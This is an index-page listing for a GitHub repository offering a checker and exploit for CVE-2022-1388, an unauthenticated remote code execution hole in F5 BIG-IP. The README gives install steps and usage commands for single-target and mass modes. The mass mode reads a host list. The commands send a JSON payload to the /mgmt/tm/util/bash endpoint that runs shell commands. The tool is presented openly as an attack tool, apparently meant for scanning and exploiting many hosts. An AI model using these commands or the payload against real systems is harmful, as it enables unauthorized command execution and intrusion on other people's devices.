Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/revanmalang/cve-2022-1388
https://github.com/revanmalang/cve-2022-1388
cve exploit
Last synced: 6 days ago
JSON representation
- Host: GitHub
- URL: https://github.com/revanmalang/cve-2022-1388
- Owner: revanmalang
- Created: 2022-11-30T04:06:56.000Z (about 2 years ago)
- Default Branch: main
- Last Pushed: 2022-11-30T04:07:51.000Z (about 2 years ago)
- Last Synced: 2024-11-25T15:22:54.766Z (2 months ago)
- Topics: cve, exploit
- Language: Python
- Homepage:
- Size: 12.7 KB
- Stars: 3
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# CVE-2022-1388
## Checking and exploit for CVE-2022-1388#### Installation:
```
python3 -m pip install -r requirements.txt
```#### Usage
Single :
```bash
python3 cve.py s [fullurl] [api_command]#example
python3 cve.py s http://127.0.0.1:8000/mgmt/tm/util/bash '{"command":"run","utilCmdArgs":"-c id"}'
```
Mass :```bash
python3 cve.py m [host list] [endpoint] [api_command] [pool]#example
python3 cve.py m host.txt /mgmt/tm/util/bash '{"command":"run","utilCmdArgs":"-c id"}' 10
```### References:
- https://github.com/Zeyad-Azima/CVE-2022-1388
- https://github.com/bandit92/CVE2022-1388_TestAPI
- https://github.com/alt3kx/CVE-2022-1388_PoC
- https://www.obrela.com/f5-big-ip-cve-2022-1388-unauthenticated-rce-vulnerability/